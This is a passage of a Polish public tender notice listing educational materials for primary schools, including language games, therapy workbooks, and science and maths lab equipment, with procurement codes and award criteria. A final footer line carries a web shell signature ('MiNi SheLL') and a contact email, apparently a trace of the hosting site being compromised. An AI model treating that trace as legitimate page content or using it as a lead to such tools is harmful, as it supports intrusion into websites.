praktykę, powtarzanie i pogłębianie wszystkich umiejętności, interesujące tematy z codziennego świata dzieci i młodzieży. Lub równoważna metoda przygotowująca do międzynarodowego certyfikatu z języka niemieckiego A1Gry językowe z języka niemieckiego, multimedialne, interaktywne lub planszowe, zakres programowy szkoła podstawowa. 1. Gra językowa Das Tagesablauf-Domino - opis dnia 2. Wer ist das? - utrwalenie słownictwa dot. wyglądu zewnętrznego 3. Gra językowa EliKit Deutsch - Essen(jedzenie) 4. Lasst uns einkaufen! - gra językowa z polską instrukcją i suplementem (zakupy) 5. Schnitzeljagd Deutsch to gra językowa o tematyce cywilizacyjno-kulturowej, w której gracze poznają charakterystyczne miejsca, zabytki, postaci, wytwory kultury i specjalności kulinarne Niemiec i krajów niemieckojęzycznych 6. Kalenderuhr - nauka czasu zegarowego i daty 7. Das Zahlespiel -gra do nauki liczebników niemieckich od 1 do 100 8.Bis Deutsch - 66 podstawowych słów języka niemieckiego 9. Wir packen unseren Koffer -do nauki niemieckich nazw części garderoby, przedmiotów, rzeczy osobistych 10. Wie geht's - uczy niemieckiego słownictwa i wyrażeń związanych z kondycją fizyczną, samopoczuciem, zdrowiem i podstawową anatomią człowieka, a także popularnymi dolegliwościami. Lub równoważne gry o tej samej tematyce dla odbiorców w wieku szkoły podstawowej.Pakiet minimum 14 zeszytów ćwiczeń do terapii czytania, pisania, rozumienia, ekspresji i słuchu fonemowego u dzieci. Lub równoważny zestaw minimum 12 zeszytów ćwiczeń do realizacji zadań korekcyjno-kompensacyjnych w terapii afazji.Gra strategiczna do wykorzystania na zajęciach korekcyjno kompensacyjnych, może być multimedialna, planszowa lub karciana. Ćwicząca logiczne i kreatywne myślenie u dzieci w wieku szkoły podstawowej. Tres - gra strategiczna. Gra wymaga skupienia i koncentracji. Pozwala ćwiczyć spostrzegawczość, myślenie logiczne i strategiczne. Zawartość: *drewniana podstawa *24 krążki w dwóch kolorach: 12 żółtych + 12 czerwonych *instrukcja *drewniane pudełko o wymiarach: 145 x 145 x 90 mm. Lub równoważna gra o tym samym przeznaczeniu.Gra planszowa dla dzieci od lat minimum 8, walor edukacyjno-terapeutyczno-wychowawczy. Lub równoważna gra planszowa o powyższych walorach.Podręcznik do prowadzenia zajęć (język niemiecki) -zadania przygotowujące do egzaminu na poziomie A1/A2 Instytutu Goethego. Fit in Deutsch A1: Podręcznik skierowany do osób uczących się języka niemieckiego na poziomie podstawowym, których celem jest przygotowanie się do egzaminu Fit in Deutsch (A1) lub do takich osób, które szukają wskazówek i ćwiczeń jak kształcić cztery sprawności językowe na poziomie podstawowym. Po objaśnieniu zasad egzaminu i zadań testowych w książce znajdują się porady i gotowe ćwiczenia. Do książki dołączona jest CD zawierająca ćwiczenia rozumienia ze słuchu. Lub równoważna pozycja o tym samym przeznaczeniu.Podręcznik do prowadzenia zajęć (język niemiecki) -zadania przygotowujące do egzaminu na poziomie A1 Instytutu Goethego. "Mit Erfolg zu Fit in Deutsch 1 podręcznik dla nauczyciela" wydawnictwa Klett. Podręcznik nauczyciela do książki Mit Erfolg zu Fit in Deutsch 1 ćwiczenia i testy. Podręcznik nauczyciela zawiera: wyjaśnienia zasad egzaminu i formularz odpowiedzi, rozwiązania i komentarze, transkrypcje nagrań, materiały do kopiowania, wskazówki do gier, jednojęzyczny słowniczek. Lub równoważna pozycja o tym samym przeznaczeniu.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>39162000-5, 39162100-6, 39162110-9, 37524100-8, 22111000-1<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: 14<br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena brutto</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">wydłużenie okresu rękojmi</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>3</td><td><b>Nazwa: </b></td><td>materiały do zajęć dla SP w Świerklańcu</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zamawiający dopuszcza produkty równoważne względem tych, które zostały opisane ze wskazaniem na konkretny znak towarowy, markę, producenta, dostawcę, patent, pochodzenie, źródło lub szczególny proces charakteryzujący produkty lub usługi dostarczone przez konkretnego wykonawcę albo nastąpiło wskazanie norm, europejskich ocen technicznych, wspólnych specyfikacji technicznych lub innych odniesień.Zakup pomocy dydaktycznych do pracowni fizycznej cz.1drut miedzianyelektroskop generator Van de Graaffaizolowane przewodylusterka wklęsło- wypukłemagnesy neodymowenaczynia połączonepryzmatprzewodniki z zakończeniem krokodylekzestaw do ćwiczeń z optyki geometrycznejteleskopzestaw magnesówbloki metali 6 różnychkrążek barw Newtona z wirownicąLustra płaskiezestaw do demonstracji energii słonecznejdemonstracja dośw. Energiamodel energia odnawialnazestaw energia ze słonej wodymodel energia termalnaturbina wiatrowazestaw różnych przyrządów do mierzeniaprzyrzad do demonstracji fal poprzecznych i podł użnychokulary ochronneklosz próźniowy z pompą ręcznązestaw 6 sprężyn z zawieszkamimiernik natężenia dźwiękuzesta w do demonstracji prawa ArchimedesaZakup pomocy do pracowni fizycznej cz.2prasa hydraulicznatermometr Galileuszaodważniki szczelinowekule magdeburskielupa szklana z rączkąrównia pochyła z wałkiemzestaw do demonstracji kolizjipotrójne wahadłoróżne podłoża do badania tarciawaga elektronicznazestaw skał i minerałówpalnik alkoholowy z knotemstojak pod palnik alkoholowy450 figur transparentnych- tangramZakup pomocy dydaktycznych do pracowni geograficznejglobus konturowyzestaw skałwiatromierzmodel układu słonecznego z planetamitermometr zaokiennystojak do przechowywania mapstacja pogodowaPolska- mapa fizycznaochrona przyrody w Polsce mapaenergia odnawialna wody, wiatru i Słońcamagnetyzm kuli ziemskiejkompasZakup pomocy dydaktycznych do pracowni matematycznej zestaw część 1bryły geometrycznebryły magnetycznebryły nieregularnebryły szkieletowebryły nieregularnekalkulator prosty dla uczniówkomplet elementów do budowy szkieletów bryłkomplet magnetycznych przyrządów tablicowychmagnetyczne bryły – ułamki zestaw 20-elementowymodele brył obrotowychpiramida matematyczprzyrząd do demonstracji powstawania brył obrotowychsiatki brył i figur geometrycznychzestaw brył „2 w 1” rozkładanych z siatkamizestaw do mierzenia długościzestaw do nauki prawdopodobieństwazestaw matematycznych gier dydaktycznychzestaw konstrukcyjny 1000 elementówBingo matemKlockiDomino matem. Zestaw 60 gier dla uczniów szkoły podstawowejKieszonkowiec matematyczny Matematyka - BrainBoxMatematyczne gry i zabawySupermatematykYINSHK - dron (czerwono-biały)Kalaha. Mancala (Wari)gra logicznaOthelloBlokustangramklocki Dienesadomino168 płytekliczmany i patyczkizestaw woreczków z cyferkamidżdżownice miarowezestaw litr do porównania objętościpieniążki edukacyjnezegar średnica 27 cmzakup pomocy Dydaktycznych do pracowni matematycznej zestaw cz 2magnetyczne ułamki jabłkawaga dydaktyczna z odważnikamidomino- zegarymagnetyczne ułamki pizzadominoQwirkleHappy Cube (sześciopak)Kamienny tangram - kwadratKolorowy kod - Colour Code Samotnik (w metalowej puszce)Sześcian z labiryntemDOMI dopełnianie do 30Piramida matematycznaStory Cubes MAXTriominos De Luxe. Trójkątne dominokarty Grabowskiego tabliczka mnożeniakarty Grabowskiego dodawanie i odejmowaniedziałania matematyczne zabawa edukacyjna dla dzieci pomoce montessorizestaw kościgra planszowabingoSchubitrixSqula- matematyczne wyzwaniageometria wokół nas- zestaw brył geometrycznych z szablonami z przedmiotami domowego użytkumatematyczny twistergry korytarzowe-działania matematycznegry korytarzowe- żółw matematycznygry korytarzowe- potrójna gra w klasygry korytarzowe- tarczagry na ścianę- liczbygra na ścianę - figurygra na ścianę- gasienica głowa, labirynt, waga, zegargra na ścianę- tetrisgra na ścianę- 4 w liniiZakupy do zajęć z j.angielskiegoGra ubieramy kotyGra domino zwierzętaLet"s eat in EnglishIrregular verbs puzzleWhat will happen if…How are you?Gra memo skojarzeniaGra memo przeciwieństwaZabawa-dopasowywanie zdańGra domino "przeczytaj i dopasuj"Gra "znajdź rym"Domino "znajdź i dopasujZakupy do zajęć z j.niemieckiego część 1Gra językowa do nauki konstruowania pytańGra językowa do nauki podstawowych słówek i wyrażeń w j.niemieckimGra językowa do nauki podstawowych rzeczownikówGra planszowa do nauki zawodów j.niemieckiGra planszowa związana z życiem w mieście, infrastrukturą, transportemGra językowa służącą do nauki nazw zwierzątGra językowa słownictwa i wyrażeń związanych z kondycją fizyczną,Gra językowa służaca poznaniu charakterystycznych miejsc, zabytków, postaciGra językowa do nauki niemieckich nazw części garderoby, przedmiotów, rzeczy osobistych -Gra językowa do nauki słownictwa Gra językowa Bis Deutsch Gra językowa do nauki liczebników 1 - 100Gra domino do nauki godzinGra językowa do nauki niemieckich czasownikówGra językowa w tematyce piratów, przygód i skarbówgra językowa służąca do nauki nazw artykułów spożywczychGra językowa z słownictwem cech fizycznychGra językowa do opanowania 40 najważniejszych nazw zawodówGra językowa Fragen und AntwortenZakupy do zajęć z języka niemieckiego cz.2Domino słownictwo czynności codziennePlanszowa gra językowaGra językowa do nauki czasowników niemieckichGra zespołowo-drużynowa ukierunowana na rozwój umiejętności komunikacyjnychGra językowa do nauki słownictwa związanego z jedzeniemGra językowa do nauki podstawowego słownictwa, oraz tworzenia prostych zdańGra językowa do nauki słownictwa związanego z ubioremZestaw dwudziestu kolorowych posterów do nauki języka niemieckiego z rysunkamZegar i Kalendarz niemiecki dla dzieci do nauki czasuProgram edukacyjny służący do przećwiczenia i sprawdzenia wiadomości,-multimedialna gra językowa do nauki słowek, gramatyki i wymowymultimedialna gra językowa do nauki najważniejszych słówek i zwrotów niemieckich.Scrabble Original-wersja niemieckaJęzyk niemiecki część I słownictwoJęzyk niemiecki część II gramatykaLotto niemieckie zwierzętaLotto niemieckie żywnośćzestaw do nauki czasownikówzestaw do nauki rzeczownikówskładanki zachęcające dzieci do czytania ze zrozumieniemukładanki do nauki podstawowych słówukładanka o różnych zagadnieniach językowych -układanka o różnych zagadnieniach językowych -zestaw 16 kolorowych masekzakup pomocy dydaktycznych do pracowni biologicznejatlas owadówatlas minerałówatlas pogoda i klimatatlas przyrodniczyatlas zwierzątatlas grzybówatlas ptakówbezkręgowe organizmy zestawbudowa ukł organy i tkanki zestkomórki i tkanki zwierzęce zestawmikroskop do kompmikroskopy optyczne model komórki roslinnejmodel komórki zwierzecejmodel kwiatumodel okamodel sercamodel skóry człowiekamodel szkieletu człowiekamodel ucha model budowy anatomicznej człowiekamodele szkieletówplansza budowa kwiatuplansza rozwoju człowiekaplansza grzybów trującychplansza obiegu wody w przyrodzieplansza zmysły człowieka plansza profili glebowychplansza chmurplansza dziobów, pazurów i tropówplansza roślin trującychplansza wskaźników biologicznychplansze-warstwy lasów<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>39162000-5, 39162100-6, 39162110-9, 37524100-8, 22111000-1<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: 14<br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena brutto</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">wydłużenie okresu rękojmi</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com